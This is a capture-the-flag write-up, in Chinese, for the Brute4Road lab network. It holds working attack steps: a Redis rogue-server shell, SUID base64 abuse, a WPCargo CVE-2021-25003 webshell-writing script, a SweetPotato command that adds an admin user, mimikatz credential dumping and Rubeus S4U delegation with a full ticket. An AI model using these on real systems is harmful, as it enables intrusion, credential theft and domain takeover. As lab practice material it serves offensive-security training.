Brute4Road春秋云镜 1 2 首先感谢sun😋😋😋 参考:https ://sun1028 .top/ && https: //xz.aliyun.com/news /13105
拿到靶机ip,做什么呢,直接fscan
flag-01
发现redis未授权访问
1 https://gi thub.com/n0b0dyCN/ redis-rogue-server/blob/m aster/
使用命令去弹shell
成功弹出来,然后去提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [redis@centos -web01 db]$ find / -perm -4000 -print 2 >/dev/null find / -perm -4000 -print 2 >/dev/null /usr/sbin /pam_timestamp_check /usr /sbin/usernetctl /usr/sbin /unix_chkpwd /usr /bin/at /usr/bin /chfn /usr /bin/gpasswd /usr/bin /passwd /usr /bin/chage /usr/bin /base64 /usr /bin/umount /usr/bin /su /usr /bin/chsh /usr/bin /sudo /usr /bin/crontab /usr/bin /newgrp /usr /bin/mount /usr/bin /pkexec /usr /libexec/dbus -1 /dbus-daemon-launch-helper/usr/lib /polkit-1/polkit -agent-helper-1 [redis@centos -web01 db]$ /base64
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [redis@centos-web01 db]$ base64 "/home/redis/flag/flag01" | base64 -d base64 "/home/redis/flag/flag01" | base64 -d ██████ ██ ██ ███████ ██ ░█░░░░██ ░██ █░█ ░██░░░░██ ░██ ░█ ░██ ██████ ██ ██ ██████ █████ █ ░█ ░██ ░██ ██████ ██████ ░██ ░██████ ░░██░░█░██ ░██░░░██░ ██░░░██ ██████░███████ ██░░░░██ ░░░░░░██ ██████ ░█░░░░ ██ ░██ ░ ░██ ░██ ░██ ░███████░░░░░█ ░██░░░██ ░██ ░██ ███████ ██░░░██ ░█ ░██ ░██ ░██ ░██ ░██ ░██░░░░ ░█ ░██ ░░██ ░██ ░██ ██░░░░██ ░██ ░██ ░███████ ░███ ░░██████ ░░██ ░░██████ ░█ ░██ ░░██░░██████ ░░████████░░██████ ░░░░░░░ ░░░ ░░░░░░ ░░ ░░░░░░ ░ ░░ ░░ ░░░░░░ ░░░░░░░░ ░░░░░░ flag01: flag{97db100b-d78e-4829-ad87-b1444166146c} Congratulations! ! ! Guess where is the second flag? [redis@centos-web01 db]$
flag-02 上传fscan和通信工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 ./fscan -h 172 .22 .2 .7 /24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1 .8 .4 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172 .22 .2 .34 is alive (icmp) Target 172 .22 .2 .7 is alive (icmp) Target 172 .22 .2 .3 is alive (icmp) Target 172 .22 .2 .18 is alive (icmp) Target 172 .22 .2 .16 is alive [*] Icmp alive hosts len is: 5 172.22.2.7:80 open172.22.2.7:22 open172.22.2.7:21 open172.22.2.3:88 open172.22.2.34:139 open172.22.2.16:135 open172.22.2.34:135 open172.22.2.3:135 open172.22.2.16:80 open172.22.2.18:80 open172.22.2.18:22 open172.22.2.7:6379 open172.22.2.16:1433 open172.22.2.16:445 open172.22.2.18:445 open172.22.2.3:445 open172.22.2.34:445 open172.22.2.16:139 open172.22.2.18:139 open172.22.2.3:139 open[*] alive ports len is: 20 start vulscan [*] NetInfo[*] 172 .22 .2 .3 [->] DC[->] 172 .22 .2 .3 172.22.2.7 当前机器172.22.2.34 XIAORANG\CLIENT01172.22.2.3 DC:DC.xiaorang.lab172.22.2.16 MSSQLSERVER.xiaorang.lab172.22.2.18 WORKGROUP\UBUNTU-WEB02[*] NetInfo[*] 172 .22 .2 .16 [->] MSSQLSERVER[->] 172 .22 .2 .16 [*] WebTitle http://172 .22 .2 .7 code:200 len:4833 title:Welcome toCentOS [*] NetInfo[*] 172 .22 .2 .34 [->] CLIENT01[->] 172 .22 .2 .34 [*] NetBios 172 .22 .2 .34 XIAORANG\CLIENT01[*] OsInfo 172 .22 .2 .16 (Windows Server 2016 Datacenter 14393 )[*] WebTitle http://172 .22 .2 .16 code:404 len:315 title:Not Found[*] NetBios 172 .22 .2 .3 [+] DC:DC.xiaorang.lab Windows Server2016 Datacenter 14393 [*] NetBios 172 .22 .2 .18 WORKGROUP\UBUNTU-WEB02[*] OsInfo 172 .22 .2 .3 (Windows Server 2016 Datacenter 14393 )[*] NetBios 172 .22 .2 .16 MSSQLSERVER.xiaorang.lab Windows Server2016 Datacenter 14393 [+] ftp 172 .22 .2 .7 :21 :anonymous[->] pub[*] WebTitle http://172 .22 .2 .18 code:200 len:57738 title:又一个WordPress站点 已完成 20 /20 [*] 扫描结束,耗时: 15 .83239473s
1 2 3 4 5 172.22.2.7 当前机器172.22.2.34 XIAORANG\CLIENT01172.22.2.3 DC:DC.xiaorang.lab172.22.2.16 MSSQLSERVER.xiaorang.lab172.22.2.18 WORKGROUP\UBUNTU-WEB02
fscan进行信息搜集,搭建代理工具
成功访问
使用kali
1 proxychains wpscan --url http://172.22.2.18/
wordpress插件有洞子
https://github.com/biulove0x/CVE-2021-25003
1 2 3 4 5 6 7 8 9 10 11 12 13 import binasciiimport requestsimport syspayload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50' def encode_character_code (c: int ): return '{:08b}' .format (c).replace('0' , 'x' ) text = '' .join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1 :] destination_url = 'http://172.22.2.18/' cmd = 'ls' requests.get(f"{destination_url} wp-content/plugins/wpcargo/includes/barcode.php?text={text} &sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php" ) print (requests.post(f"{destination_url} webshell.php?1=system" , data={"2" : cmd}).content.decode('ascii' , 'ignore' ))
连接之后发现找不到去数据库看看
拿下
flag-03
1 fscan -h 172.22 .2 .16 -m mssql -pwdf pwd .txt
土豆提权
拿MDUT链接,sweetpotato提权,开Ole上传sweetpotato.exe
1 2 C:/Users/Public/SweetPotato.exe -a "net user lanyangyang qwer1234! /add" C:/Users/Public/SweetPotato.exe -a "net localgroup administrators lanyangyang /add"
flag-04 win信息搜集一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 C:\Users\lanyangyang>systeminfo 主机名 : MSSQLSERVER OS 名称 : Microsoft Windows Server 2016 Datacenter OS 版本 : 10.0.14393 暂缺 Build 14393 OS 制造商 : Microsoft Corporation OS 配置 : 成员服务器 OS 构件类型 : Multiprocessor Free 注册的所有人 : 注册的组织 : Aliyun 产品 ID : 00376-40000-00000-AA947 初始安装日期 : 2022/6/8, 16:30:01 系统启动时间 : 2026/2/12, 16:55:32 系统制造商 : Alibaba Cloud 系统型号 : Alibaba Cloud ECS 系统类型 : x64-based PC 处理器 : 安装了 1 个处理器。 [01] : Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz BIOS 版本 : SeaBIOS 449e491, 2014/4/1 Windows 目录 : C:\Windows 系统目录 : C:\Windows\system32 启动设备 : \Device\HarddiskVolume1 系统区域设置 : zh-cn;中文(中国) 输入法区域设置 : zh-cn;中文(中国) 时区 : (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐 物理内存总量 : 3,950 MB 可用的物理内存 : 1,409 MB 虚拟内存 : 最大值: 4,654 MB 虚拟内存 : 可用: 1,018 MB 虚拟内存 : 使用中: 3,636 MB 页面文件位置 : C:\pagefile.sys 域 : xiaorang.lab 登录服务器 : \\MSSQLSERVER 修补程序 : 安装了 6 个修补程序。 [01] : KB5013625 [02] : KB4049065 [03] : KB4486129 [04] : KB4486131 [05] : KB5014026 [06] : KB5013952 网卡 : 安装了 1 个 NIC。 [01] : Red Hat VirtIO Ethernet Adapter 连接名 : 以太网 启用 DHCP : 是 DHCP 服务器 : 172.22.255.253 IP 地址 [01] : 172.22.2.16 [02] : fe80::444e:2b2b:eb24:e70a Hyper-V 要求 : 已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。
1 2 提升权限 命令:privilege::debug 提取登录凭据 命令 sekurlsa::logonpasswords
看一下域渗透攻击路径分析图
MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派,传个猕猴桃mimikatz.exe上去并用管理员身份运行
1 blob :https://github.com/75 f6af11-50 ab-4 ea5-a43d-4 fe006cbdc89
1 2 提升权限 命令:privilege::debug 提取登录凭据 命令 sekurlsa::logonpasswords
约束委派攻击 MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派,用Rubeus申请自身的服务票据,用通过 S4U 伪造 ST
首先用Rubeus.exe申请自身的服务票据//这个工具得自己去编译
1 Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:4250ef4c15bfeb685371970e1be00b85 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
得到票据
注入票据
1 Rubeus .exe s4u /impersonateuser:Administrator / msdsspn:CIFS /DC.xiaorang.lab / dc:DC .xiaorang.lab /ptt / ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+ gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+ gAwIBEqEDAgECooIEUQSCBE1btfneTGYuYI+ fnwsBbpz9d80968QVyp/krgzq88XpZdXIydeuCa0Ox+Y2XeHdywDbZ8TEC2/ PPQ7XTj4xkQ5Se /iY6tlhKKUozG8T0y0+6E1YQzAlDsB0qCPdg5V4sptRaK/ mD+ K8x3lr6IOUAZLPdngf4yW + zPleZWKLoVpWiDE9GNh+ 1h6XLacLFanztFoaB/yTetP2GuqJ0U2edNPwYVgn+K3y4klqfjQnpAxA61vQrgQSD2Rcl4JqRSVFUary3JKF+Pf7IMXApZGz25NqmPyTMkfBXlLFDr/ DuQzh + 3Fd2yxCtvw6MOzZwREQ9SKQVFGg8VesAOkVXQd9twFD7mU8wWYnryqHjJUc+ B /VD/ MCl2mYbpm7UdVHOLtIY52dP613S7bnol7R8E + MvmFbsRsRFQbl7OCzTPtYdDXMMXWtQydVIgmaVQk1EQlQ4KYCpLpaYrTzvtg841iO66Zt2zM97K0mpGVQBX + KRun8 + 0QIsdynifLvMtFnFE+ MkjePEhvGAa6YkZhH0XlNtRUA4caXBg + KNr0 /Cgr/ h9xOcDXIJA40+ E5XS0 /NjOKNHKIlZs3Nf9g0D5CI5vEncQisucBDp0fmVVylY1oMFzwhStWRszTwtQ+tax1GMjmM8UewFxLcxmhn6nBVQMkLkJ5vaQbSz+8Ko9ldCpEV3ShDi/ w02lMGxJFfwQeTqWquFlhFuR506yOHlX6sQPIq7Q2R4LNLoDcHRFr+ xs826u7Xa/cKLtCrSQor2bLQs7nWVuVJRsCx5m2UKalffwWxowhSoPEnoNyI+GM7t59LI7qud+Q8bfb9VH+/ 2QpHzuY2SOlojbi4jl8gwoxvdMTUAZuJZBWsRZHwELmIMSJ6rcYbri5cdYHGpYVR6gA0UyhDtZrL5AUSHIg8xEwBoHxaI70OTi1RZl/q+F1rMdW+7tbrd+JGHSlx917zEbepDn95m0OyqFNhwOUU59HU57VuAN7HCAlG1RqMHaXC2KihJNjlu2TU3zjhi08lAE3k3J+91FXAWE/ AkCaMj1R2yH5OmhQQWLOTm8RMsphOSqupoiwTs4Gmmg6WPZHMBabGwUCdzsFkLeHHCrONIosnn7ifo8u /o+cSKCo1R+zKK4eD1dvudnsfdShHzNEFgkhVahkKwRzZMnzQ77pL5hHOSUg/ 5GEv10eXvi+ ktWq9AhYIBJ/6FP1P9GarT+6sM3X/ Vpdy1GeRVBrMYRVJ20iZ5 /RqkLb2oEvBaa74gPsD9DntAff3R/ MgAt7130GeixmR5giywd + SrGjsweO + uR8iiRR9cxe6/TirkN4BdQMder7dYavEc8q0X7drdebDB4XgG9sY9+YkSsudo2pZHnHKEykga6iqoAS66BoxObyGtfn2QamjUARvD8n4bJGUTC8ed1yclN7P8M9Zgth77CpuVVYpnuR7+cNoPBSwALDQ55PMLa9gQoC83vzKbVvSr5dE/ fqjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAIogDroed1KhPlRRifj/ AboQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDIxMzE2MjQ1MlqmERgPMjAyNDAyMTQwMjI0NTJapxEYDzIwMjQwMjIwMTYyNDUyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg ==
读取flag
1 type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
拿下flag(其实并非拿下,因为我没编译,04都是偷的图哈哈哈哈)
